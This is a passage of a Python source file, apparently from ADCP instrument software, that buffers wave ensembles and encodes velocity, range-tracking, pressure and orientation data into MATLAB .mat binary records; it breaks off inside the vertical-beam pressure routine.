logger.setLevel(logging.ERROR)
FORMAT = '[%(asctime)-15s][%(levelname)s][%(name)s:%(funcName)s] %(message)s'
logging.basicConfig(format=FORMAT)
class WaveForceCodec:
"""
Decode the ensemble data into a WaveForce Matlab file format.
"""
def __init__(self):
self.Lat = 0.0
self.Lon = 0.0
self.EnsInBurst = 0
self.FilePath = ""
self.Buffer = []
self.BufferCount = 0
self.RecordCount = 0
self.Bin1 = 0
self.Bin2 = 0
self.Bin3 = 0
self.PressureSensorDepth = 0
self.firstTime = 0
self.secondTime = 0 # Used to calculate the sample timing
self.selected_bin = []
def init(self, ens_in_burst, path, lat, lon, bin1, bin2, bin3, ps_depth):
"""
Initialize the wave recorder
:param ens_in_burst: Number of ensembles in a burst.
:param path: File path to store the file.
:param lat: Latitude data.
:param lon: Longitude data.
:param bin1: First selected bin.
:param bin2: Second selected bin.
:param bin3: Third selected bin.
:param ps_depth: Pressure Sensor depth. Depth of the ADCP.
"""
self.EnsInBurst = ens_in_burst
self.FilePath = path
self.Lat = lat
self.Lon = lon
self.Buffer = []
self.BufferCount = 0
self.Bin1 = bin1
self.Bin2 = bin2
self.Bin3 = bin3
self.PressureSensorDepth = ps_depth
self.RecordCount = 0
self.selected_bin.append(bin1)
self.selected_bin.append(bin2)
self.selected_bin.append(bin3)
self.firstTime = 0
self.secondTime = 0 # Used to calculate the sample timing
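# Hedged usage sketch (illustrative; `codec` and `decoded_ensembles` are
# assumptions, not part of this module):
#   codec = WaveForceCodec()
#   codec.init(ens_in_burst=1024, path="waves_out/", lat=32.0, lon=-117.0,
#              bin1=8, bin2=9, bin3=10, ps_depth=30)
#   for ens in decoded_ensembles:   # ensembles produced by an ADCP decoder
#       codec.add(ens)              # writes a .mat record once a burst is complete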
def add(self, ens):
"""
Add the ensemble to the buffer. When the buffer number has been met,
process the buffer and output the data to a matlab file.
:param ens: Ensemble to buffer.
"""
if self.EnsInBurst > 0:
logger.debug("Added Ensemble to burst")
# Add to the buffer
self.Buffer.append(ens)
self.BufferCount += 1
# Process the buffer when a burst is complete
if self.BufferCount == self.EnsInBurst:
# Get the ensembles from the buffer
ens_buff = self.Buffer[0:self.EnsInBurst]
# Remove the ensembles from the buffer
del self.Buffer[0:self.EnsInBurst]
self.BufferCount = 0
# Process the buffer
th = threading.Thread(target=self.process, args=[ens_buff])
th.start()
def process(self, ens_buff):
"""
Process all the data in the ensemble buffer.
:param ens_buff: Ensemble data buffer.
"""
logger.debug("Process Waves Burst")
# Local variables
num_bins = len(self.selected_bin)
num_4beam_ens = 0
num_vert_ens = 0
wus_buff = bytearray()
wvs_buff = bytearray()
wzs_buff = bytearray()
beam_0_vel = bytearray()
beam_1_vel = bytearray()
beam_2_vel = bytearray()
beam_3_vel = bytearray()
beam_vert_vel = bytearray()
rt_0 = bytearray()
rt_1 = bytearray()
rt_2 = bytearray()
rt_3 = bytearray()
rt_vert = bytearray()
pressure = bytearray()
vert_pressure = bytearray()
heading = bytearray()
pitch = bytearray()
roll = bytearray()
water_temp = bytearray()
height = bytearray()
avg_range_track = bytearray()
sel_bins_buff = bytearray()
ps_depth_buff = bytearray()
ens_waves_buff = []
# Convert the buffer to wave ensembles
# Process the data for each waves ensemble
for ens in ens_buff:
# Create a waves ensemble
ens_wave = WaveEnsemble()
ens_wave.add(ens, self.selected_bin)
# Add the waves ensemble to the list
ens_waves_buff.append(ens_wave)
if ens_wave.is_vertical_ens:
# Vertical Beam data
num_vert_ens += 1
# Pressure (WZP)
vert_pressure.extend(struct.pack('f', ens_wave.pressure))
for sel_bin in range(num_bins):
# Beam Velocity (WZ0)
beam_vert_vel.extend(struct.pack('f', ens_wave.vert_beam_vel[sel_bin]))
# Range Tracking (WZR)
rt_vert.extend(struct.pack('f', ens_wave.range_tracking[0]))
else:
# 4 Beam Data
num_4beam_ens += 1
pressure.extend(struct.pack('f', ens_wave.pressure)) # Pressure (WPS)
heading.extend(struct.pack('f', ens_wave.heading)) # Heading (WHG)
pitch.extend(struct.pack('f', ens_wave.pitch)) # Pitch (WPH)
roll.extend(struct.pack('f', ens_wave.roll)) # Roll (WRL)
water_temp.extend(struct.pack('f', ens_wave.water_temp)) # Water Temp (WTS)
height.extend(struct.pack('f', ens_wave.height)) # Height (WHS)
avg_range_track.extend(struct.pack('f', ens_wave.avg_range_tracking)) # Avg Range Tracking (WAH)
# Range Tracking (WR0, WR1, WR2, WR3)
rt_0.extend(struct.pack('f', ens_wave.range_tracking[0])) # Beam 0 RT
if ens_wave.num_beams > 1:
rt_1.extend(struct.pack('f', ens_wave.range_tracking[1])) # Beam 1 RT
if ens_wave.num_beams > 2:
rt_2.extend(struct.pack('f', ens_wave.range_tracking[2])) # Beam 2 RT
if ens_wave.num_beams > 3:
rt_3.extend(struct.pack('f', ens_wave.range_tracking[3])) # Beam 3 RT
for sel_bin in range(num_bins):
# Earth Velocity (WUS, WVS, WZS)
wus_buff.extend(struct.pack('f', ens_wave.east_vel[sel_bin]))
wvs_buff.extend(struct.pack('f', ens_wave.north_vel[sel_bin]))
wzs_buff.extend(struct.pack('f', ens_wave.vertical_vel[sel_bin]))
# Beam Velocity (WB0, WB1, WB2, WB3)
beam_0_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][0])) # Beam 0 Beam Velocity
if ens_wave.num_beams > 1:
beam_1_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][1])) # Beam 1 Beam Velocity
if ens_wave.num_beams > 2:
beam_2_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][2])) # Beam 2 Beam Velocity
if ens_wave.num_beams > 3:
beam_3_vel.extend(struct.pack('f', ens_wave.beam_vel[sel_bin][3])) # Beam 3 Beam Velocity
# Selected Bins
if ens_buff[0].IsEnsembleData:
for sel_bin in range(num_bins):
bin_ht = ens_buff[0].AncillaryData.FirstBinRange + (self.selected_bin[sel_bin] * ens_buff[0].AncillaryData.BinSize)
sel_bins_buff.extend(struct.pack('f', bin_ht))
# Pressure Sensor Depth
ps_depth_buff.extend(struct.pack('f', self.PressureSensorDepth))
ba = bytearray()
ba.extend(self.process_txt(ens_buff[0])) # [TXT] Txt to describe burst
ba.extend(self.process_lat(ens_buff[0])) # [LAT] Latitude
ba.extend(self.process_lon(ens_buff[0])) # [LON] Longitude
ba.extend(self.process_wft(ens_buff[0])) # [WFT] Time from the first ensemble
ba.extend(self.process_wdt(ens_buff)) # [WDT] Time between ensembles
ba.extend(self.process_whv(sel_bins_buff, num_bins)) # [WHV] Wave Cell Depths
ba.extend(self.process_whp(ps_depth_buff)) # [WHP] Pressure Sensor Height
ba.extend(self.process_wus(wus_buff, num_4beam_ens, num_bins)) # [WUS] East Velocity
ba.extend(self.process_wvs(wvs_buff, num_4beam_ens, num_bins)) # [WVS] North Velocity
ba.extend(self.process_wzs(wzs_buff, num_4beam_ens, num_bins)) # [WZS] Vertical Velocity
ba.extend(self.process_wb0(beam_0_vel, num_4beam_ens, num_bins)) # [WB0] Beam 0 Beam Velocity
ba.extend(self.process_wb1(beam_1_vel, num_4beam_ens, num_bins)) # [WB1] Beam 1 Beam Velocity
ba.extend(self.process_wb2(beam_2_vel, num_4beam_ens, num_bins)) # [WB2] Beam 2 Beam Velocity
ba.extend(self.process_wb3(beam_3_vel, num_4beam_ens, num_bins)) # [WB3] Beam 3 Beam Velocity
ba.extend(self.process_wr0(rt_0, num_4beam_ens)) # [WR0] Beam 0 Range Tracking
ba.extend(self.process_wr1(rt_1, num_4beam_ens)) # [WR1] Beam 1 Range Tracking
ba.extend(self.process_wr2(rt_2, num_4beam_ens)) # [WR2] Beam 2 Range Tracking
ba.extend(self.process_wr3(rt_3, num_4beam_ens)) # [WR3] Beam 3 Range Tracking
ba.extend(self.process_wps(pressure, num_4beam_ens)) # [WPS] Pressure
ba.extend(self.process_whg(heading, num_4beam_ens)) # [WHG] Heading
ba.extend(self.process_wph(pitch, num_4beam_ens)) # [WPH] Pitch
ba.extend(self.process_wrl(roll, num_4beam_ens)) # [WRL] Roll
ba.extend(self.process_wts(water_temp, num_4beam_ens)) # [WTS] Water Temp
ba.extend(self.process_whs(height, num_4beam_ens)) # [WHS] Wave Height Source. (User Select. Range Tracking Beam or Vertical Beam or Pressure)
ba.extend(self.process_wah(avg_range_track, num_4beam_ens)) # [WAH] Average Range Tracking
ba.extend(self.process_wz0(beam_vert_vel, num_vert_ens, num_bins))        # [WZ0] Vertical Beam Beam Velocity
ba.extend(self.process_wzp(vert_pressure, num_vert_ens)) # [WZP] Vertical Beam Pressure
ba.extend(self.process_wzr(rt_vert, num_vert_ens)) # [WZR] Vertical Beam Range Tracking
# Write the file
self.write_file(ba)
# Increment the record count
self.RecordCount += 1
def write_file(self, ba):
"""
Write the Bytearray to a file. Save it with the record number
:param ba: Byte Array with record data.
:return:
"""
# Check if the file path exist, if not, then create the file path
if not os.path.isdir(self.FilePath):
os.mkdir(self.FilePath)
filename = self.FilePath + "D0000" + str(self.RecordCount) + ".mat"
with open(filename, 'wb') as f:
f.write(ba)
def process_txt(self, ens):
"""
This will give a text description of the burst. This includes the record number,
the serial number, and the date and time the burst started.
Data Type: Text
Rows: 1
Columns: Text Length
txt = 2013/07/30 21:00:00.00, Record No. 7, SN013B0000000000000000000000000000
:param ens: Ensemble data.
:return: Byte array of the data in MATLAB format.
"""
txt = ens.EnsembleData.datetime_str() + ", "
txt += "Record No. " + str(self.RecordCount) + ", "
txt += "SN" + ens.EnsembleData.SerialNumber
ba = bytearray()
ba.extend(struct.pack('i', 11)) # Indicate float string
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", len(txt))) # Columns - Length of the txt
ba.extend(struct.pack("i", 0)) # Imaginary, if 1, then the matrix has an imaginary part
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'txt'): # Name
ba.extend([code])
ba.extend(bytearray(1))
for code in map(ord, txt): # Txt Value
ba.extend(struct.pack('f', float(code)))
return ba
def process_lat(self, ens):
"""
The latitude location where the burst was collected.
Data Type: Double
Rows: 1
Columns: 1
lat = 32.865
:param ens: Ensemble data.
"""
lat = 0.0
if ens.IsWavesInfo:
lat = ens.WavesInfo.Lat
else:
lat = self.Lat
ba = bytearray()
ba.extend(struct.pack('i', 0)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", 1)) # Columns - 1 per record
ba.extend(struct.pack("i", 0)) # Imaginary, if 1, then the matrix has an imaginary part
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'lat'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", lat)) # Lat Value
return ba
def process_lon(self, ens):
"""
The longitude location where the burst was collected.
Data Type: Double
Rows: 1
Columns: 1
lon = -117.26
:param ens: Ensemble data.
"""
lon = 0.0
if ens.IsWavesInfo:
lon = ens.WavesInfo.Lon
else:
lon = self.Lon
ba = bytearray()
ba.extend(struct.pack('I', 0)) # Indicate double
ba.extend(struct.pack('I', 1)) # Rows - 1 per record
ba.extend(struct.pack("I", 1)) # Columns - 1 per record
ba.extend(struct.pack("I", 0)) # Imaginary
ba.extend(struct.pack("I", 4)) # Name Length
for code in map(ord, 'lon'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", lon)) # Lon Value
return ba
def process_wft(self, ens):
"""
First sample time of the burst in seconds.
Data Type: Double
Rows: 1
Columns: 1
wft = 7.3545e+05
:param ens: Ensemble data.
"""
self.firstTime = self.time_stamp_seconds(ens)
ba = bytearray()
ba.extend(struct.pack('i', 0)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", 1)) # Columns - 1 per record
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wft'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", self.firstTime)) # WFT Value
return ba
def process_wdt(self, ens_buff):
"""
Time between each sample. The time is in seconds.
Data Type: Double
Rows: 1
Columns: 1
wdt = 0.5000
:param ens_buff: Ensemble data buffer.
"""
# Find the first and second time
# Make sure that if we are interleaved,
# that we take the next sample that is like the original subsystem config
ba = bytearray()
if len(ens_buff) >= 4:
# Get the first 4 Beam sample
if ens_buff[0].IsEnsembleData:
subcfg = ens_buff[0].EnsembleData.SubsystemConfig
subcode = ens_buff[0].EnsembleData.SysFirmwareSubsystemCode
self.firstTime = self.time_stamp_seconds(ens_buff[0])
# Check if both subsystems match
# If they do match, then there is no interleaving and we can take the next sample
# If there is interleaving, then we have to wait for the next sample, because the first 2 go together
if ens_buff[1].EnsembleData.SubsystemConfig == subcfg and ens_buff[1].EnsembleData.SysFirmwareSubsystemCode == subcode:
self.secondTime = WaveForceCodec.time_stamp_seconds(ens_buff[1])
else:
self.secondTime = WaveForceCodec.time_stamp_seconds(ens_buff[2])
wdt = self.secondTime - self.firstTime
ba.extend(struct.pack('i', 0)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per record
ba.extend(struct.pack("i", 1)) # Columns - 1 per record
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wdt'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(struct.pack("d", wdt)) # WDT Value
return ba
def process_whv(self, whv, num_selected_bins):
"""
Wave Cell Height for each selected bin.
Data Type: Float
Rows: 1
Columns: Number of selected bins
whv = 7.3, 7.2, 7.5
:param whv: Wave Cell Height data in byte array for each selected bin.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per burst
ba.extend(struct.pack("i", num_selected_bins)) # Columns - 1 each selected bin
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whv'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whv) # WHV Values
return ba
def process_whp(self, whp):
"""
Wave Pressure Sensor Height for each burst.
Data Type: Float
Rows: 1
Columns: 1
whp = 7.3
:param whp: Wave Pressure Sensor Height data in byte array for the burst.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', 1)) # Rows - 1 per burst
ba.extend(struct.pack("i", 1)) # Columns - 1 per burst
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whp'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whp) # WHP Values
return ba
def process_wus(self, wus, num_4beam_ens, num_selected_bins):
"""
East velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wus = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wus: East velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wus'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wus) # WUS Values
return ba
def process_wvs(self, wvs, num_4beam_ens, num_selected_bins):
"""
North velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wvs = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wvs: North velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wvs'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wvs) # WVS Values
return ba
def process_wzs(self, wzs, num_4beam_ens, num_selected_bins):
"""
Vertical velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wzs = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wzs: Vertical velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wzs'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wzs) # WZS Values
return ba
def process_wb0(self, wb0, num_4beam_ens, num_selected_bins):
"""
Beam 0 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb0 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb0: Beam 0 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb0'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb0) # WB0 Values
return ba
def process_wb1(self, wb1, num_4beam_ens, num_selected_bins):
"""
Beam 1 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb1 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb1: Beam 1 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb1'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb1) # WB1 Values
return ba
def process_wb2(self, wb2, num_4beam_ens, num_selected_bins):
"""
Beam 2 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb2 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb2: Beam 2 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb2'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb2) # WB2 Values
return ba
def process_wb3(self, wb3, num_4beam_ens, num_selected_bins):
"""
Beam 3 Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of 4 Beam values
Columns: Number of selected bins
wb3 = 7.3, 7.2, 7.5
7.2, 4.1, 6.7
:param wb3: Beam 3 Beam velocity data in byte array for each selected bin.
:param num_4beam_ens: Number of 4 Beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wb3'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wb3) # WB3 Values
return ba
def process_wps(self, wps, num_4beam_ens):
"""
Pressure data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WPS = 7.3, 7.2, 7.5
:param wps: Pressure data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wps'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wps) # WPS Values
return ba
def process_whg(self, whg, num_4beam_ens):
"""
Heading data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WHG = 7.3, 7.2, 7.5
:param whg: Heading data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whg'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whg) # WHG Values
return ba
def process_wph(self, wph, num_4beam_ens):
"""
Pitch data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WPH = 7.3, 7.2, 7.5
:param wph: Heading data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wph'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wph) # WPH Values
return ba
def process_wrl(self, wrl, num_4beam_ens):
"""
Roll data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WRL = 7.3, 7.2, 7.5
:param wrl: Roll data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wrl'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wrl) # WRL Values
return ba
def process_wts(self, wts, num_4beam_ens):
"""
Water Temp data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WTS = 7.3, 7.2, 7.5
:param wts: Water Temp data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wts'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wts) # WTS Values
return ba
def process_whs(self, whs, num_4beam_ens):
"""
Wave height source data.
Average of RT, or a single RT value, or pressure.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WHS = 7.3, 7.2, 7.5
:param whs: Wave height source data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'whs'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(whs) # WHS Values
return ba
def process_wah(self, wah, num_4beam_ens):
"""
Average height data.
Average of all Range Tracking.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WAH = 7.3, 7.2, 7.5
:param wah: Average Range Tracking data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wah'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wah) # WAH Values
return ba
def process_wr0(self, wr0, num_4beam_ens):
"""
Range Tracking Beam 0 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR0 = 7.3, 7.2, 7.5
:param wr0: Range Tracking Beam 0 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr0'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr0) # WR0 Values
return ba
def process_wr1(self, wr1, num_4beam_ens):
"""
Range Tracking Beam 1 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR1 = 7.3, 7.2, 7.5
:param wr1: Range Tracking Beam 1 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr1'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr1) # WR1 Values
return ba
def process_wr2(self, wr2, num_4beam_ens):
"""
Range Tracking Beam 2 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR2 = 7.3, 7.2, 7.5
:param wr2: Range Tracking Beam 2 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr2'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr2) # WR2 Values
return ba
def process_wr3(self, wr3, num_4beam_ens):
"""
Range Tracking Beam 3 data.
Data Type: Float
Rows: Number of 4 Beam values
Columns: 1
WR3 = 7.3, 7.2, 7.5
:param wr3: Range Tracking Beam 3 data in byte array.
:param num_4beam_ens: Number of 4 beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_4beam_ens)) # Rows - Number of 4 Beam ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wr3'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wr3) # WR3 Values
return ba
def process_wz0(self, wz0, num_vert_ens, num_selected_bins):
"""
Beam 0 Vertical Beam velocity data for each selected bin.
Data Type: Float
Rows: Number of Vertical values
Columns: Number of selected bins
WZ0 = 7.3, 7.2, 7.5
:param wz0: Beam 0 Vertical Beam velocity data in byte array for each selected bin.
:param num_vert_ens: Number of vertical beam ensembles.
:param num_selected_bins: Number of selected bins.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_vert_ens)) # Rows - Number of Vertical ensembles
ba.extend(struct.pack("i", num_selected_bins)) # Columns - Number of selected bins
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wz0'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wz0) # WZ0 Values
return ba
def process_wzp(self, wzp, num_vert_ens):
"""
Vertical Beam Pressure data.
Data Type: Float
Rows: Number of Vertical values
Columns: 1
WZP = 7.3, 7.2, 7.5
:param wzp: Vertical Beam pressure data in byte array.
:param num_vert_ens: Number of vertical ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_vert_ens)) # Rows - Number of Vertical ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wzp'): # Name
ba.extend([code])
ba.extend(bytearray(1))
